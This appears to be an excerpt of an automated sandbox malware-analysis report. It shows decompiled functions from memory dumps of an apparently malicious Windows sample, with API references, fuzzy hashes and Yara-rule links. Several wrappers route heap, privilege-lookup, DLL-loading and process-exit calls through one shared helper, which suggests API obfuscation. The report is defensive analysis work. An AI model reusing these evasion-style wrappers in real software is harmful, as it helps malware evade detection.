APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Strings

3333, xrefs: 0040829E

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID: 3333
API String ID: 1836367815-2924271548
Opcode ID: 19df6f3e422e47fb4cb99f5d2abd918e1c05b9e873b87ecbc3a6db01d8631461
Instruction ID: 94cd82e6fbe7f54dc4f2edc3825d8dc7f696d9b9e61217e909e301c86f2c50d0
Opcode Fuzzy Hash: 19df6f3e422e47fb4cb99f5d2abd918e1c05b9e873b87ecbc3a6db01d8631461
Instruction Fuzzy Hash: F4012B356402187BD7146A948D42FBF3758AF40B14F09806EFE44BB2C1DABD691146EA

Uniqueness

Uniqueness Score: -1.00%

Function 00419FE6, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D

Strings

oLA, xrefs: 0041A03C, 0041A048

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: oLA
API String ID: 1279760036-3789366272
Opcode ID: aff755edc344460093ae04b16f9c76cd1a164dcac7a67f8eb0f602c435db2482
Instruction ID: 29ad499be37d584889f77aeefc13dcf3000a108f28cbda79f6eeff0a301f8517
Opcode Fuzzy Hash: aff755edc344460093ae04b16f9c76cd1a164dcac7a67f8eb0f602c435db2482
Instruction Fuzzy Hash: 92E02BB910D3402FCB11DF74AC91CEB7B999EC1318724444FF48843643D524D81683F1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D

Strings

oLA, xrefs: 0041A03C, 0041A048

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: oLA
API String ID: 1279760036-3789366272
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A052, Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041A052(void* __eax, void* __edx, void* __esi, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				char _t14;
				void* _t20;

				asm("sbb [esi], edx");
				_pop( *_t2);
				asm("stosd");
				asm("movsd");
				asm("lds edx, [ebp-0x75]");
				_t11 = _a8;
				_t5 = _t11 + 0xc74; // 0xc74
				E0041A950(_t20, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t14;
			}

0x0041a058
0x0041a05a
0x0041a05d
0x0041a05e
0x0041a05f
0x0041a063
0x0041a06f
0x0041a077
0x0041a08d
0x0041a091

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: aa3ff4d5705f0aabec42dd8e4bc84202ed2c8f1a6e949ae432e7b62c70d7784d
Instruction ID: e6479fd366c7a922938a7be0aa36af370cff6c25e33acd94ed852b9ea8c6183f
Opcode Fuzzy Hash: aa3ff4d5705f0aabec42dd8e4bc84202ed2c8f1a6e949ae432e7b62c70d7784d
Instruction Fuzzy Hash: 57F0A075200100AFD724DF69CC85EEBB7B8EF84350F108559F9889B201C631E804CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a06f
0x0041a077
0x0041a08d
0x0041a091

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1da
0x0041a1f0
0x0041a1f4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1BB, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A1BB(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				char _v21;
				int _t12;
				void* _t17;

				_v21 = _v21 - 1;
				asm("sbb eax, 0xec8b5554");
				_t9 = _a4;
				E0041A950(_t17, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t12;
			}

0x0041a1bb
0x0041a1be
0x0041a1c3
0x0041a1da
0x0041a1f0
0x0041a1f4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 4785d4fb0f70667c952715ada1b7890c9024f3df336d815098852bed6490daeb
Instruction ID: 5236ddc03b708d77cd692501bf6584efb111acc787a59ccfe10e730f6b9e7821
Opcode Fuzzy Hash: 4785d4fb0f70667c952715ada1b7890c9024f3df336d815098852bed6490daeb
Instruction Fuzzy Hash: A7E09AB1200208ABCB10DF98CC81FEB3B6AAF84250F018559F94C6B242C930E814CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0a3
0x0041a0ba
0x0041a0c8

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACB3, Relevance: 1.5, APIs: 1, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040ACB3() {
				struct _OBJDIR_INFORMATION _t7;
				void* _t14;

				_t7 = E0041AE90();
				 *(_t14 - 0xc) = _t7;
				if(_t7 == 0) {
					LdrLoadDll(0, 0, _t14 - 8, _t14 - 0xc); // executed
					_t7 =  *(_t14 - 0xc);
				}
				return _t7;
			}

0x0040ad11
0x0040ad19
0x0040ad1e
0x0040ad32
0x0040ad34
0x0040ad34
0x0040ad3a

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: cbabfa608bee130a4ae9c6c6eb7502d5fbf61627b20c2a435349dd8ea99ba60d
Instruction ID: b917e7e08b0e3ef50a4489ccf529e3ab18a5d6c0b267f342811f2e6cce3d896b
Opcode Fuzzy Hash: cbabfa608bee130a4ae9c6c6eb7502d5fbf61627b20c2a435349dd8ea99ba60d
Instruction Fuzzy Hash: D5E086B5D0020AABDF00CA84CC41F9DB375DF54308F1042A6E918D7640E534EA55CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0041A097, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041A097(int _a4) {
				intOrPtr _v0;
				char _v1;
				void* _v1947432107;
				void* _t14;

				asm("enter 0xf95b, 0xcb");
				_push( &_v1);
				_t6 = _v0;
				E0041A950(_t14, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
				ExitProcess(_a4);
			}

0x0041a097
0x0041a0a0
0x0041a0a3
0x0041a0ba
0x0041a0c8

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d7a20c9308c4227e27a6e75f02046cc0fc28852b8fb601b2c5157511e3e227c7
Instruction ID: 041e98e9e6c04fd5d7c66163a9fd1a3856fe1f9ab8e84375c0954bea0dae0bcf
Opcode Fuzzy Hash: d7a20c9308c4227e27a6e75f02046cc0fc28852b8fb601b2c5157511e3e227c7
Instruction Fuzzy Hash: 1FE0C2B05152412FD710EB25CC86EC77F689F46320F25855EE8E82B113C175A210CBE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00AA26F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: 00fbdf996bbf5d472b246497b7f89a30198a6a1df8a309d190dc9c064492b6ec
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: 81F02230724049ABDB09EB1C9E61B6A73E6EB95300F54C038ED4DCB291E735DE508390

Uniqueness

Uniqueness Score: -1.00%

Function 00417267, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b7fd549d07ea2b50494466b5a67832406fb63c2b78f47ea994c02279d234b8
Instruction ID: fa10489a72bf93e9fca48c33dffed5ab751de156a0958a0f885f36846247cfef
Opcode Fuzzy Hash: 97b7fd549d07ea2b50494466b5a67832406fb63c2b78f47ea994c02279d234b8
Instruction Fuzzy Hash: 3DD0A727A89484194260DCF8F0500B1EFA1ADCB417714A2F5DA19EBA008603C4558788

Uniqueness

Uniqueness Score: -1.00%

Function 004172C5, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E004172C5(void* __ecx) {
				signed char _t1;

				asm("sbb eax, 0x56eadad1");
				_pop(_t1);
				 *0xfc1e244b =  *0xfc1e244b & _t1;
				asm("int3");
				asm("sbb dh, [ecx+edi*2-0x4a2be5ed]");
				return _t1;
			}

0x004172c5
0x004172cb
0x004172cc
0x004172d9
0x004172db
0x004172ec

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7793ca9c416f81ddb5df604d4e5625160c660f9924349d6019ef146c47914655
Instruction ID: 7411becf0cbd12432313cdd7cc6c7c0087e156c720f90a304603b0a8393dbf13
Opcode Fuzzy Hash: 7793ca9c416f81ddb5df604d4e5625160c660f9924349d6019ef146c47914655
Instruction Fuzzy Hash: FED01247FD95480181158DD834A5170FBA2CA97437B5027DBDE5CEBC53840381160389

Uniqueness

Uniqueness Score: -1.00%

Function 00AB8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00AB8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00AB8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A9E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00AB718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00AB8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00AB718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00AB8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00AB8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00AB8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00AB718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A9E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A92340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00AAE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A9E2A8(_t322,  &_v68, _v16);
								if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00AAE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A9E2A8(_t322,  &_v68, _t236);
								if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00AB718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A9E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A92340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00AAE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A9E2A8(_v12,  &_v68, _v16);
							if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00AAE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A9E2A8(_t322,  &_v68, _t269);
							if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00AB718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A9E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A92340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00AAE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A9E2A8(_v12,  &_v68, _v16);
						if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00AAE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A9E2A8(_t322,  &_v68, _t296);
						if(E00AB5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A9E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00ab8788
0x00ab8788
0x00ab8791
0x00ab8794
0x00ab8798
0x00ab879b
0x00ab879e
0x00ab87a1
0x00ab87a4
0x00ab87a7
0x00ab87aa
0x00ab87af
0x00b01ad3
0x00ab8b0a
0x00ab8b0d
0x00ab8b13
0x00ab8b19
0x00ab8b1f
0x00ab8b25
0x00ab8b2b
0x00ab8b31
0x00ab8b37
0x00ab8b3d
0x00ab8b46
0x00ab8b46
0x00ab87c6
0x00ab87d0
0x00b01ae0
0x00b01ae6
0x00b01af8
0x00b01af8
0x00b01afd
0x00b01afe
0x00b01b01
0x00b01b06
0x00b01b06
0x00ab87d6
0x00ab87f2
0x00ab87f7
0x00ab8807
0x00ab880a
0x00ab880f
0x00ab8810
0x00ab8813
0x00ab8818
0x00ab8818
0x00ab882c
0x00ab8831
0x00ab8838
0x00ab8908
0x00ab8920
0x00ab89f0
0x00ab8a08
0x00ab8af6
0x00ab8af6
0x00ab8af8
0x00ab8afb
0x00b01beb
0x00b01beb
0x00ab8b04
0x00b01bf8
0x00b01c0e
0x00b01c13
0x00b01c16
0x00b01c16
0x00b01bf8
0x00000000
0x00ab8b04
0x00ab8a0e
0x00ab8a11
0x00ab8a14
0x00ab8a15
0x00ab8a18
0x00ab8a22
0x00ab8b59
0x00ab8a28
0x00ab8a3c
0x00ab8a3c
0x00ab8a42
0x00b01bb0
0x00b01b11
0x00b01b11
0x00000000
0x00ab8a48
0x00ab8a51
0x00ab8a5b
0x00ab8a5e
0x00ab8a61
0x00ab8a69
0x00ab8a69
0x00ab8a6d
0x00000000
0x00000000
0x00ab8a74
0x00ab8a7c
0x00ab8a7d
0x00ab8a91
0x00ab8a93
0x00ab8a93
0x00ab8a98
0x00ab8a9b
0x00ab8aa1
0x00ab8aa1
0x00ab8aa4
0x00ab8aaa
0x00ab8ab1
0x00ab8ac5
0x00ab8ac7
0x00ab8ac7
0x00ab8ac5
0x00ab8ace
0x00b01bc9
0x00b01bce
0x00b01bd2
0x00b01bd2
0x00ab8ad8
0x00ab8aeb
0x00ab8aeb
0x00ab8af0
0x00ab8af4
0x00000000
0x00ab8af4
0x00ab8a42
0x00ab8926
0x00ab8929
0x00ab892c
0x00ab892d
0x00ab8930
0x00ab8935
0x00ab893a
0x00ab8b51
0x00ab8940
0x00ab8954
0x00ab8954
0x00ab895a
0x00b01b63
0x00000000
0x00ab8960
0x00ab8969
0x00ab8973
0x00ab8976
0x00ab8979
0x00ab897e
0x00ab8981
0x00ab8981
0x00ab8986
0x00000000
0x00000000
0x00b01b6e
0x00b01b74
0x00b01b7b
0x00b01b8f
0x00b01b91
0x00b01b91
0x00b01b99
0x00b01b9c
0x00b01ba2
0x00b01ba2
0x00ab898c
0x00ab8992
0x00ab8999
0x00ab89ad
0x00b01ba8
0x00b01ba8
0x00ab89ad
0x00ab89b6
0x00ab89c8
0x00ab89cd
0x00ab89d0
0x00ab89d0
0x00ab89d6
0x00ab89e8
0x00ab89e8
0x00ab89ed
0x00000000
0x00ab89ed
0x00ab895a
0x00ab883e
0x00ab8841
0x00ab8844
0x00ab8845
0x00ab8848
0x00ab884d
0x00ab8852
0x00ab8b49
0x00ab8858
0x00ab886c
0x00ab886c
0x00ab8872
0x00b01b0e
0x00000000
0x00ab8878
0x00ab8881
0x00ab888b
0x00ab888e
0x00ab8891
0x00ab8896
0x00ab8899
0x00ab8899
0x00ab889e
0x00000000
0x00000000
0x00b01b21
0x00b01b27
0x00b01b2e
0x00b01b42
0x00b01b44
0x00b01b44
0x00b01b4c
0x00b01b4f
0x00b01b55
0x00b01b55
0x00ab88a4
0x00ab88aa
0x00ab88b1
0x00ab88c5
0x00b01b5b
0x00b01b5b
0x00ab88c5
0x00ab88ce
0x00ab88e0
0x00ab88e5
0x00ab88e8
0x00ab88e8
0x00ab88ee
0x00ab8900
0x00ab8900
0x00ab8905
0x00000000
0x00ab8905

APIs

_wcspbrk.LIBCMT ref: 00AB8891
_wcspbrk.LIBCMT ref: 00AB8979
_wcspbrk.LIBCMT ref: 00AB8A61
_wcspbrk.LIBCMT ref: 00AB8A9B
_wcspbrk.LIBCMT ref: 00B01B9C

